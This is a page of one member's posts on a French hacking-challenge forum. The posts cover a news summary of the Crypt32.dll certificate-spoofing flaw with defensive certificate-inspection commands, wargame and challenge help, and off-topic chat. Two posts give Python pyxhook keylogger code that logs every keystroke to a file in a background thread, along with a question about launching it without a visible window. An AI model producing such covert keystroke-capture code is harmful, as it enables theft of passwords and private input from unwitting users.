logo Homepage
+  NewbieContest
Username:
Password:
  Voir les messages
Pages: 1 [2] 3 4 5
16  News / News Hacking/Cracking/Phreaking / Re : Ne vous faites pas interpeller avec votre smartphone sinon... le: 25 Janvier 2020 à 00:44:48
Est ce que tout cela est bien légal?
Le gouvernement a-t-il le droit d'utiliser des 0-days (s'il en utilise) afin de faire ce qu'il veux? (Tiens, ça me donne une idée pour un petit dossier tout ça...)
Ou alors pourrait-il s'agir de contrats afin d'intégrer une bonne grosse backdoor?

Dans tous les cas, la moralité, c'est qu'il faut arrêter d'utiliser tous ces services et apps à la con qui ne servent qu'à l'auto-flicage, et ce, depuis le début. Et que tout le monde est bien d'accord mais que tout le monde s'en fou et continue d'utiliser.
"Ah mais Facebook c'est des méchants, je le sais bien, ils font du recel d'informations! #Jequittefacebookmaistropmdrletruc"

Ou alors on assume totalement le fait de voir jour après jour chacune de ses libertés s'envoler d'un coup d'un seul au nom d'une pseudo-sécurité. (Liberté de vie privée, de libre circulation, liberté de réunion...) Finalement qu'en on y pense,
"Je m'en fou de la vidéo surveillance, j'ai rien à cacher!"
"C'est pas grave les micros en ville, j'ai rien à cacher!"
A ba tiens, mais en fait c'est plus juste en ville, combien de caméra dans nos foyers susceptible d'enregistrer nos moindres gestes? Combien de micros enregistrant la moindre seconde? Même les robots mixeur bordel!
"Attends, mais tu te rends pas bien compte comment Google c'est trop génial! Avant je devais utiliser mon cerveau!"
La donnée utilisateur, c'est la nouvelle drogue à la mode pour tous ces [autocensure]. Et vue que la fin justifie les moyens...

En fait, qu'en on y pense, y'a que la police qui est à la ramasse loin derrière, fallait bien qu'ils trouvent une combine! Comme ça c'est plus simple.
 
Pour en revenir à nos moutons,
Qu'en est-il des partitions chiffrées? Est ce que ça pourrait être une solution envisageable? Dans tous les cas les données de la partition système seraient extraites... Utiliser une version spécifique modifiée d'Android? J'ai vu de vieux articles la dessus, mais qui dataient un peu...

Sinon [mode vengeance aussi], on pourrait monter un petit IEM dans un boîtier de smartphone, charge par USB. Et BAM! Ça c'est du Rock!   [/end mode vengeance]
17  News / News Hacking/Cracking/Phreaking / Crypt32.dll certificate spoofing. le: 19 Janvier 2020 à 05:50:09
Bonjour à tous!
Alors on parlait comme ça sur IRC que ça faisait longtemps qu'il n'y avait pas eu de news, et effectivement, la dernière date un peu... Et ben alors, qu'est ce qui se passe???
Et puis on a parlé aussi de Crypt32.dll, et que ce serait bien d'avoir une news là dessus, et comme je suis super sympa, voici un petit résumé.

Ce Mardi 14 Janvier 2020, Microsoft a corrigé  une faille de sécurité majeure touchant les dernières versions de Windows (apparemment seulement Windows 10, Windows Server 2016 et Windows Server 2019).
La faille a été découverte par la NSA qui l'a gentiment fait remonter à Microsoft, elle concerne Crypt32.dll, qui est utilisée pour vérifier l'authenticité d'un logiciel ou d'une mise à jour.

Petite explication de ce qu'est Crypt32.dll :
Ce que nous en dit Microsoft, crypt32.dll est un module fourni avec les systèmes d'exploitation Windows et Windows Server, implémentant de nombreuses fonctions de certificat et de messagerie chiffrée dans CryptoAPI, tel que CryptSignMessage.

« Crypt32.dll is the module that implements many of the Certificate and Cryptographic Messaging functions in the CryptoAPI, such as CryptSignMessage. Crypt32.dll is a module that comes with the Windows and Windows Server operating systems, but different versions of this DLL provide different capabilities. There is no API to determine the version of CryptoAPI that is in use, but you can determine the version of Crypt32.dll that is currently in use by using the GetFileVersionInfo and VerQueryValue functions. »

Pour faire simple, crypt32.dll est un outil spécifique à Windows qui permet de vérifier l’authenticité des certificats fournis, et ainsi approuver une application ou bien un site Web.

Un patch a donc été proposé, mise à jour de la faille : CVE-2020-0601.
Comme on peut s'attendre à que cette vulnérabilité voit rapidement fleurir des outils un peu partout (merci l'internet!), s’il vous plait les administrateurs, attendez un peu avant de l'appliquer !    (le vieux script kiddy...)

Sinon, pour ce qui est de la vulnérabilité :
Elle est présente dans la façon dont Windows CryptoAPI valide les certificats ECC (Elliptic Curve Cryptography) et est classée comme importante ! Ces certificats sont créés par Windows par exemple pour la gestion du traffic HTTPS.  La cause principale de cette vulnérabilité est une implémentation défectueuse de la Elliptic Curve Cryptography (ECC) dans le code de Microsoft.
Alors je suis allé voir ce qu’était cette fameuse ECC, je vous ferais bien un résumé mais c’est très bien expliqué ici par un jeu de billard pour ceux qui veulent se rendre un peu plus compte :
https://medium.com/zengo/win10-crypto-vulnerability-cheating-in-elliptic-curve-billiards-2-69b45f2dcab6
En gros il s’agit de la façon dont Windows gère ses chiffrements, je laisse la parole aux experts !


Pour l’exploitation,
il s’agirait de se créer une nouvelle clé privée qui correspondrait à la clé publique, car le code de Windows vérifie des certificats non standards, ce qui permet à un attaquant de spécifier des paramètres dans son certificat et de le signer au nom d'autrui, pour se faire passer pour tel site web, ou encore de distribuer des mises à jour logicielles...
La vulnérabilité de validation de certificat permet donc d'outrepasser la façon dont Windows fait confiance à une entité, et peut ainsi laisser activer une exécution de code à distance.
Pour ce qui est d’un fichier exécutable, l'utilisateur n'aurait aucun moyen de savoir s’il s’agit d’une source fiable car la signature numérique proviendrait d'un fournisseur dit de "confiance".
De fil en aiguille, il est ainsi possible de se positionner Man in the Middle, et on imagine vite un large panel d’exploitations.

Voici les exemples trouvés où la validation de confiance peut être affectée:
  • Les connexions HTTPS.
  • Les fichiers signés et les courriers électroniques.
  • Les exécutables signés passés en user-mode.



Comment détecter et se prévenir de cette attaque ?
Selon le billet de la NSA (https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF),
L'utilisation de proxys d'inspection TLS correctement configurés et gérés valident indépendamment les certificats TLS des entités externes et rejetteront les certificats non valides ou non approuvés, protégeant ainsi les endpoints des certificats qui tentent d'exploiter ces vulnérabilités.
Il faut donc s'assurer que la validation des certificats est activée pour les proxys TLS afin de limiter son exposition, et bien sûr examiner les logs pour détecter les signes d'exploitation (Merci à la NSA pour ce commentaire très pertinent).

Wireshark peut être utilisé pour analyser et extraire les certificats des données de protocole réseau pour une analyse supplémentaire.
Les utilitaires OpenSSL et Windows certutil peuvent être utilisés pour effectuer une analyse approfondie des certificats afin de de vérifier les propriétés malveillantes.

Certutil peut être utilisé pour examiner un certificat X509 (format standard de certificat électronique et algorithme pour la validation de chemin de certification) par la commande suivante:
Code:
certutil –asn <certificate_filename>
Avec OpenSSL:
Code:
openssl asn1parse –inform DER –in <certificate_filename> –i –dump
ou
Code:
openssl x509 –inform DER –in <certificate_filename> –text

Je vous laisse lire la suite !;)  N'hésitez pas à me corriger, et si on avait un ou deux cas pratiques ce serait super cool ! (À bon entendeur.)

Sources:
https://www.lemonde.fr/pixels/article/2020/01/14/microsoft-corrige-une-faille-de-securite-majeure-apres-un-signalement-de-la-nsa_6025873_4408996.html
https://www.guru3d.com/news-story/microsoft-patches-crypt32-dll-vulnerability-that-allows-certificate-spoofing.html
https://docs.microsoft.com/fr-fr/windows/win32/seccrypto/crypt32-dll-versions
https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d
https://medium.com/zengo/win10-crypto-vulnerability-cheating-in-elliptic-curve-billiards-2-69b45f2dcab6
18  Challenges / Aide Hacking / Re : Hacking - Galerie d'images le: 17 Janvier 2020 à 07:15:13
Salut Dean665,
Bon déjà, c'est pas très gentil de dénigrer comme ça sans savoir, il y a bien du monde ici! Quoique parfois discret... (En même temps c'est pas Facebook ici donc on va pas créer un nouveau post à chaque fois qu'on a manger une pomme?) Mais si tu veux discuter, go IRC/Discord tu y rencontreras des gens supers sympas!
Bon après niveau tutos inéxistants, on va dire que c'est pour te forcer à aller chercher plus loin l'information par toi même, c'est tellement plus gratifiant. Sinon en fouinant un peu tu devrais tomber sur 2 ou 3 blogs sympa qu'on certains membres ici.

Enfin bref, à l'heure d'aujourd'hui ce ne sont pas les ressources qui manquent, mais faut-il encore savoir ce que l'on cherche! (Très belle transition vers notre second point.) Donc premièrement petite recherche sur ce fameux .db, ça mange pas de pain.
Et ensuite,
Il s'agit ici d'un trick simple, donc pas besoin d'aller chercher trop compliqué.
Je pense qu'on ne peut pas trop t'en dire plus, sachant qu'il y a déjà pas mal de pages sur le sujet, des indices s'y seront sûrement dissimulés. Sauras tu tous les trouver?

See ya!
19  Général / Général / Re : Besoin d'aide ! le: 28 Décembre 2019 à 02:28:54
C'est un peu plus complexe que ça en fait...

Casser une archive, ou un compte online, ou bien encore un serial sont trois choses tout à fait différentes.
Et donc le mieux c'est de s'y pencher dessus, car malheureusement personne ne te donnera de solution miracle en main. Et personne ne pourras apprendre à ta place. Effectivement au début ça pourra te paraître un peu flou et long, perdu dans cette masse d'informations.
Il faudra arriver à déterminer ton "objectif" à atteindre car les chemins seront quelque peu différent.

Quoi qu'il en soit,
Je pense (mais j'ai jamais demandé à personne) que le départ type pour débuter serait de commencer au niveau des failles web (cf Catégories Client Side, puis Hacking) (Je dis pas de faire exclusivement ces catégories, mais c'est là ou tu trouveras le plus de challs abordables (du moins pour le début)), ça te permettra déjà de te familiariser avec le code source (de manière générale qu'est ce que c'est? à quoi ça sert?) et tu te développeras petit à petit un certain sens de l'analyse.
 
Il faut de là toujours se documenter, encore se documenter, faire le tri de ce que tu as besoin, puis mettre de coté ce que tu n'as pas besoin mais qui est intéressant quand même. Éviter les tutos douteux, analyser chaque donnée en profondeur, arriver a trouver de manière efficace l'information.

Attaquer en parallèle la programmation (d'abord un seul langage avant de courir tout azimut), car finalement tout n'est que programme (bienvenue dans la Matrice), donc si tu veux aller plus loin tu n'y couperas pas. Et en plus tu seras capable (dans certains cas) de commencer à te développer tes propres outils en fonction de tes besoins, et ça c'est la classe! Mais ça se fera naturellement petit à petit.

Sinon, pour revenir au "crack de mot de passe", il existe de nombreux logiciels spécifique à tel ou tel besoin, apprendre à s'en servir c'est bien, mais si tu veux progresser il faudra aller bien au delà. Et puis méfiance avec ce genre d'outils que l'on trouve partout sur le net. Quand tu auras téléchargé deux trois virus tu comprendras de quoi je parle.

Et comme dit le dicton: "C'est en forgeant qu'on devient forgeron", alors commence à forger!

Sinon pour le mot de la fin:
Attention avec ce genre de questions à la *** qui ont déjà été traité des millions de fois un peu partout et qui peuvent énerver certains par leur caractère redondant, donc le premier réflexe (valable à vie!): Aller se chercher sa p***** d'information avant de poster! Et sinon je suis sûr que sur IRC/Discord des tas de gens seront ravis de pouvoir t'aider.

Have fun!


EDIT: À mais que vois-je???
Fil épinglé: 1 an de NC - retour d'expérience et petit guide pour débutants
Fil épinglé: Cours spécial débutant, ou comment commencer sur NewbieContest « 1 2 ... 5 6 »
...
20  Challenges / Aide Programmation / Re : Prog - Hyperlecture le: 17 Juillet 2019 à 12:49:31
Bonjour à tous!

Approchant de la fin, je me demandais dans quelles mesures pouvons nous concidérer un caractère comme ambigue.
x/X, c/C, v/V, o/O/0, q/p/P, -/_, J/l, ...

Faut-il essayer de faire un peu de tri quand même, ou alors vraiment on s'en fou?
Merci.
21  News / News du site / Re : Gagnez 3 places pour LeHACK, rien que ça... le: 05 Juillet 2019 à 21:29:37
Et ben voilà!
gg, plus qu'à monter à Paris.
22  Challenges / Aide Javascript/Java/HTML / Re : JS - Tiens une applet ! le: 02 Juillet 2019 à 14:17:40
Comme le disait badsam333 à la même date:
Citation
Il y a moyen de s'en sortir sans "voir" l'applet.
En fait, je pense que je ne les ai même jamais vu tourner dans un navigateur
Allez, bonne chance! 
23  Challenges / Aide Programmation / Re : Prog - Hyperlecture le: 29 Juin 2019 à 13:41:23
Salut, je sais pas si ça vaut pour l'instant le coup de répondre. Concours en cours!
Mais rappelle toi que tu n'as que 2 secondes pour valider.
24  Challenges / Aide Wargame / Re : Wargame - Après la pile le tas le: 08 Juin 2019 à 17:42:53
Bonjour bonjour,
J'ai du mal à m'y retrouver pour celle-là...

Imaginons que je vise:
0xbffffbc0 : 0x080488e4 (Exécution normale)
pour y insérer 0xb7e9f575 tel que 0xbffffbc0 : 0xb7e9f575.

Je vois que j'arrive à me déplacer:
0xbffffbc0 : 0x080488b7 (Segmentation fault)
0xbffffbc0 : 0x0804b7e9  (Segmentation fault)
0xbffffbc0 : 0x08b7e9f5  (Segmentation fault)

Mais lorsque je devrait me retrouver avec mon:
0xbffffbc0 : 0xb7e9f575  (Exploit)

Je me retrouve de nouveau avec mon:
0xbffffbc0 : 0x080488e4
(Exécution normale)
  Kézako  C'est quoi l'histoire? J'aimerai bien comprendre.

Cependant, j'arrive très bien à y inscrire n'importe quoi d'autre comme 0x41414141:
0xbffffbc0 : 0x41414141  (Segmentation fault)

Par contre, quand je veux y inscrire sa propre valeur 0x080488e4 j'obtient un joli:
0xbffffbc0 : 0x080488e4  (Segmentation fault)  alors que valeur initiale.


Visiblement, je ne dois pas très bien m'y prendre ou taper au bon endroit, mais ça n'explique pas ce comportement étrange... Si quelqu'un pouvait m'éclairer?
Ou alors juste me dire que c'est normal et je me débrouille avec ça! ; )

Merci beaucoup!

Edit: Adresses et valeurs choisies au hasard pour l'exemple.
25  Général / Defouloir / Re : Fun Fact le: 04 Février 2019 à 14:39:55
Le personnage de Mario créé en 1981 pour le jeu Donkey Kong, a été mis en remplacement de Popeye (s'opposant alors contre Brutus pour sauver sa douce Olive).
Nintendo n'ayant pas eu les droits d'exploitation dût s'adapter, et c'est ainsi que sont nées deux des plus grandes mascottes de la marque : Mario (initialement connu sous le nom de Jumpman) et bien sûr, du titre éponyme, Donkey Kong.
26  Général / Defouloir / Re : ODGPROD label de musique libre le: 19 Décembre 2018 à 13:41:49
Citation
Par contre, ce n'est pas super clair niveau droits d'auteur, c'est juste écrit "free and legal", mais ça reste plutôt laconique.
C'est vrai que c'est une très bonne question. Je m'en étais arrété au téléchargement gratuit. J'ai cherché la réponse mais pour l'instant pas moyen de trouvé. Du coup je leur ai posé directement la question, on verra ce qu'ils en disent.
Après dans la "Bass Culture", ça sample à tout va, ça remix dans tous les sens, donc on peut supposer (méfiance quand même) qu'ils proposent leurs musiques dans ce même état d'esprit.

Ce ne sont pas vraiment des gens que je connais, mais pour beaucoup ce sont des artistes de ma régions  et ça fait pas mal d'années qu'on peut les voir sur scène. (Pour ceux qui connaissent, par exemple Kanka est produit sous ce label.)
C'est la curiosité qui m'a amené à creuser un peu et j'ai constaté qu'il y avait finalement pas mal de monde sous ce même nom. Ayant toujours pronné l'accès pour tous à la culture et le partage de l'information, j'ai trouvé leur démarche vraiment sympa.
27  Général / Defouloir / ODGPROD label de musique libre le: 17 Décembre 2018 à 14:52:12
Bonjour à tous!
On parle souvent de logiciels libres, mais l'open source n'est pas le seul à se battre pour le libre.
Pour ceux que ça intéresse, un label de musique totalement libre et légale, il s'agit de ODGPROD : http://odgprod.com/
C'est avant tout orienté dub/electro, mais pas que, et c'est surtout plein d'artistes à découvrir!
-Panda Dub
-Rakoon
-Tetra Hydro K
-...
28  Programmation / Autres langages / Re : Python - Tkinter le: 17 Décembre 2018 à 14:33:25
Salut,

Citation
Ai je dis que c'était un sujet banni ?
Ok, c'était pour être sur, je prenais position au cas ou.

Citation
J'ai parlé d'autorun via clé USB, pas d'autre chose.
C'est ce que je me suis dit après coup. Je trouvais ça bizarre aussi. 

Bon ba si on a fait le tour, il nous reste plus qu'à souhaiter bonne chance à Skyroryk alors.
See ya!
29  Programmation / Autres langages / Re : Python - Tkinter le: 15 Décembre 2018 à 23:44:58
Bonsoir bonsoir,
Effectivement, essayons d'appeler les choses par leur nom, après ce qu'on en fait c'est autre chose.

Dans un petit script maison on pourrait vite fait faire un truc du genre (pour reprendre mon code d'avant) :
Code:
def task(self):                                                  
def kbevent(event):
global running
if chr(event.Ascii) == 'E': # Création du raccourci.
                                os.listdir("/home/") # Ou n'importe quoi finalement, on fait ce qu'on veut.
Aucune frappe n'est enregistrée mais on peut quand même s'en servir. Bon ici mon histoire n'est pas trop fonctionnel, on préfèrerait plutot un 'ctrl'+'e' par exemple, mais ca illustre quand même un peu.
Par contre effectivement, si tu veux que ton programme soit un tantinet transportable, il vaudrait mieux s'orienter sur un langage compilé.

Par rapport au caractère controversé qu'on pourrait trouver dans cette discussion, pour moi qui suit autodidacte, je trouve que ça reste une  façon assez ludique d'aborder la programmation, d'apprendre le réseau, les protocoles... Plutôt que de suivre bètement un cours sur le net, autant se poser des problématiques sympas et se plonger dans les docs! (Mais c'est cool les cours sur internet hein, je ne veux pas laisser penser le contraire.)
Cela dit, je ne veux légitimer en aucun cas tout comportement plus que discutable. Mais on fait des contests de Hacking ou quoi?

Du coup ça peut être pas mal de finir tout ça en python, se rendre compte de ses avantages comme de ses limites, et puis repartir pour un tour sur un autre langage. Bon par contre ça peut prendre un certain temps, effectivement...

Sinon,
Citation
En l’occurrence, à ma connaissance, il n'existe depuis plusieurs années plus aucun moyen d'exécuter un programme lors du branchement d'une clé USB.
La dessus, j'en mettrais pas ma main à couper. Je pense bien a quelque chose (la faille ultime!), et qui ne s'arrète pas qu'au clés malheureusement (/ou tout l'inverse je sais plus^^), mais vraiment trop compliqué à réaliser. ;p (Là, je parle pour moi.)
30  Programmation / Autres langages / Re : Python - Tkinter le: 11 Décembre 2018 à 17:43:57
Salut,
j'arrive un peu après la guerre, mais pyhook est vraiment pas mal et bien documenté. (J'ai utilisé la version Linux Pyxhook, mais je pense que ca être très similaire sur windows.)
Tu peux aussi appeler ta fonction de capture au travers d'un thread de façon à pouvoir la garder plus facilement ouverte. (Ce sont des pistes que j'ai exploré.)

Petit exemple avec pyxhook:
Code:
import pyxhook
import threading
from fonctionEcrire import *

class Keylogger(threading.Thread):   
def __init__(self):
threading.Thread.__init__(self)

def task(self):                                                   # Cette fonction est appellee a chaque fois qu'une touche du clavier est pressee.
def kbevent(event):
global running
Ecrire("donnees", chr(event.Ascii))  # Trouver un emplacement absolu ça peut aider!

# Creation hookmanager
hookman = pyxhook.HookManager()
# Hook le keyboard
hookman.KeyDown = kbevent
hookman.HookKeyboard()
# Start
hookman.start()

while running:
time.sleep(0.1)

# Close
hookman.cancel()
pass
Sur le même principe tu peux faire le hookman.HookMouse() (clic gauche, clic droit, etc...)
Pour Ecrire le fichier j'utilise write() aussi, je ne la détaille pas.

Ensuite tu peux démarrer la capture au travers d'un thread avec:
Code:
#(... Début du programme)

running = True
TH = Keylogger()
Ecrire("donnees", "\n\nDebut de la session d'enregistrement le : "+heure+".\n\n")
TH.start()

#(... Suite du programme)

#Et par exemple pour quitter:
if messagerecu == exitcode :
running = False # Pour pouvoir quitter le keylogger.

C'est la seule façon que j'ai trouvé pour capturer quoi qu'il arrive, et même avec la fenêtre du programme en arrière plan. Par contre pour l'ouverture "discrète", je ne sais pas comment tu pourrais empécher l'ouverture d'une fenêtre. Il n'y avait pas une astuce à ce sujet, en jouant avec l'extension .py(?) ?
Pages: 1 [2] 3 4 5